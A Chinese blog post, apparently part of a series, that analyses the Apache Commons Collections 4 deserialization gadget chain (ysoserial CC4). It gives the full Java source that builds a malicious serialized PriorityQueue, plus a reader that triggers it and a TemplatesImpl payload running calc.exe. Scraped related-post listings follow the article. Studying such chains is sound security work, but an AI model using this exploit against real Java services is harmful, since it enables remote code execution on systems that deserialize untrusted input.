1.前言

这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意

缩减版的函数调用栈如下图所示:

2.利用链分析:

调用还是从PriorityQueue.readObject函数开始

一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函数中将调用chainedTransformer的transform方法了

这里第一个要利用的还是ConstantTransformer,要返回TrAXfilter类

接下来第二轮将调用Traxfilter类入口参数类型为Templates的构造函数,并且实例化调用该构造函数传入templatesImpl类的实例

接下来到TraxFilter的构造函数中将调用templatesImpl.newTransformer(),就可以是实例化_bytecode中存储的类进行rce了

yso构造分析:

首先构造一个Templates类的实例,然后开始构造chianed链需要的东西,首先就是一个Constanttransformer

然后再构造chained的第二个元素就是该链相对于cc2的区别为InstantiateTransformer类

接下来将两个transformer放进chaind,并且构造外层的PriorityQueue,并将chined放入TransformingComparator,然后再将Templates放到instantiate实例的参数和参数类型中,至此

就构造结束了

手动exp构造:

exp.java

  1. package CommonsCollections4;
  2. import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  4. import javassist.*;
  5. import org.apache.commons.collections4.Transformer;
  6. import org.apache.commons.collections4.comparators.ComparableComparator;
  7. import org.apache.commons.collections4.comparators.TransformingComparator;
  8. import org.apache.commons.collections4.functors.ChainedTransformer;
  9. import org.apache.commons.collections4.functors.ConstantTransformer;
  10. import org.apache.commons.collections4.functors.InstantiateTransformer;
  11.  
  12. import javax.xml.transform.Templates;
  13. import java.io.File;
  14. import java.io.FileOutputStream;
  15. import java.io.IOException;
  16. import java.io.ObjectOutputStream;
  17. import java.lang.reflect.Field;
  18. import java.util.PriorityQueue;
  19.  
  20. public class exp {
  21.     public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {
  22.         TemplatesImpl tmp = new TemplatesImpl();
  23.         ClassPool pool = ClassPool.getDefault();
  24.         pool.insertClassPath(new ClassClassPath(payload.class));
  25.  
  26.         CtClass pay_class = pool.get(payload.class.getName());
  27.         byte[] payCode = pay_class.toBytecode();
  28.         Class clazz;
  29.         clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
  30.         //存储payload类
  31.         Field byteCode = clazz.getDeclaredField("_bytecodes");
  32.         byteCode.setAccessible(true);
  33.         byteCode.set(tmp,new byte[][]{payCode});
  34.         Field name  = clazz.getDeclaredField("_name");
  35.         name.setAccessible(true);
  36.         name.set(tmp,"tr1ple");
  37.  
  38.         Transformer[] trans = new Transformer[]{
  39.                 new ConstantTransformer(TrAXFilter.class),
  40.                 new InstantiateTransformer(
  41.                         new Class[]{Templates.class},
  42.                         new Object[]{tmp})
  43.         };
  44.  
  45.         ChainedTransformer chian = new ChainedTransformer(trans);
  46.         //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));
  47.         TransformingComparator transCom = new TransformingComparator(chian);
  48.  
  49.         PriorityQueue queue = new PriorityQueue(2);
  50.         queue.add(1);
  51.         queue.add(1);
  52.  
  53.         Field com = PriorityQueue.class.getDeclaredField("comparator");
  54.         com.setAccessible(true);
  55.         com.set(queue,transCom);
  56.  
  57.         //序列化
  58.         File file;
  59.         file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
  60.         ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file));
  61.         obj_out.writeObject(queue);
  62.  
  63.     }
  64. }

readobj.java

  1. package CommonsCollections4;
  2.  
  3. import java.io.*;
  4. import java.lang.Runtime;
  5.  
  6. public class readObj {
  7.     public static void main(String[] args) throws IOException, ClassNotFoundException {
  8.         File file;
  9.         file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
  10.         ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
  11.         obj.readObject();
  12.     }
  13. }

payload.java

  1. package CommonsCollections4;
  2.  
  3. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  4. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  5. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  6. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  7. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  8.  
  9. import java.io.IOException;
  10.  
  11. public class payload extends AbstractTranslet {
  12.     {
  13.         try {
  14.             Runtime.getRuntime().exec("calc.exe");
  15.         } catch (IOException e) {
  16.             e.printStackTrace();
  17.         }
  18.     }
  19.     public payload(){
  20.         System.out.println("tr1ple 2333");
  21.     }
  22.  
  23.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  24.     }
  25.  
  26.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  27.  
  28.     }
  29. }
  1.  

java反序列化-ysoserial-调试分析总结篇(4)的更多相关文章

  1. java反序列化-ysoserial-调试分析总结篇(2)

    前言: 这篇主要分析commonCollections2,调用链如下图所示: 调用链分析: 分析环境:jdk1.8.0 反序列化的入口点为src.zip!/java/util/PriorityQueu ...

  2. java反序列化-ysoserial-调试分析总结篇(6)

    前言: 这篇记录CommonsCollections6的调试,外层也是新的类,换成了hashset,即从hashset触发其readObject(),yso给的调用链如下图所示 利用链分析: 首先在h ...

  3. java反序列化-ysoserial-调试分析总结篇(3)

    前言: 这篇文章主要分析commoncollections3,这条利用链如yso描述,这个与cc1类似,只是反射调用方法是用的不是invokeTransformer而用的是InstantiateTra ...

  4. java反序列化-ysoserial-调试分析总结篇(5)

    前言: 这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribut ...

  5. java反序列化-ysoserial-调试分析总结篇(7)

    前言: CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞 yso构造分析: 首先构造进行rc ...

  6. java反序列化——apache-shiro复现分析

    本文首发于“合天智汇”公众号 作者:Fortheone 看了好久的文章才开始分析调试java的cc链,这个链算是java反序列化漏洞里的基础了.分析调试的shiro也是直接使用了cc链.首先先了解一些 ...

  7. java集合源码分析几篇文章

    java集合源码解析https://blog.csdn.net/ns_code/article/category/2362915

  8. ysoserial CommonsColletions1分析

    JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer链 ...

  9. 浅谈java反序列化工具ysoserial

    前言 关于java反序列化漏洞的原理分析,基本都是在分析使用Apache Commons Collections这个库,造成的反序列化问题.然而,在下载老外的ysoserial工具并仔细看看后,我发现 ...

随机推荐

  1. 关于前端html5的总结

    简介 HTML5 是HTML语言的第5次重大修改产生的新的HTML语言版本 HTML5 是W3C组织和众多主要浏览器厂商以及众多开发者共同努力的结果,得之不易 HTML5 主要改进包括:增加新的HTM ...

  2. 【转】修改Ubuntu系统的登陆信息的简单方法

    转自http://www.jb51.net/os/Ubuntu/414663.html Ubuntu的登陆和欢迎信息控制/etc/issue和/etc/motd/etc/issue与/etc/motd ...

  3. 缩写: i = i + 1 和 i += 1,可以看做是 i 自加的值 是1。

    i +=  1; 这样有助于记忆: i自加的值等于1

  4. 吴裕雄--天生自然python学习笔记:python 用 Open CV通过人脸识别进行登录

    人脸识别登录功能的基本原理是通过对比两张图片的差异度来判断两张图片是 否是同 一人的面部 . 对比图片 差异度 的算法有很多种,本例中使用“颜色直方图” 算法来实现对人脸图像的识别. 下面为比较 im ...

  5. Java面试题3-附答案

    接口有什么用 1.通过接口可以实现不相关类的相同行为,而不需要了解对象所对应的类. 2.通过接口可以指明多个类需要实现的方法. 3.通过接口可以了解对象的交互界面,而不需了解对象所对应的类. 另:Ja ...

  6. Django学习之模板层

    三板斧 render,HttpResponse,redirectrender返回一个HTML页面,并且还能够给该页面传数据render内部原理: from django.template import ...

  7. [LC] 398. Random Pick Index

    Given an array of integers with possible duplicates, randomly output the index of a given target num ...

  8. Python||NameError: name 'reload' is not defined

    多半是运行如下代码时报错: import sysreload(sys)sys.setdefaultencoding("utf-8")123这段代码是为了解决Python中中文输出出 ...

  9. webpack中使用ECharts

    npm安装ECharts 引入ECharts 通过 npm 上安装的 ECharts 和 zrender 会放在node_modules目录下.可以直接在项目代码中 require('echarts' ...

  10. 16)用了session会话技术

    为什么用session会话技术? 因为假如你进入后台,不可能随意进入,即使你的验证通过了,那么还需要一个变量来存一个标志,假如标志的值是yes,那么我们可以直接进入后台的首页,无需验证,但是,标志是n ...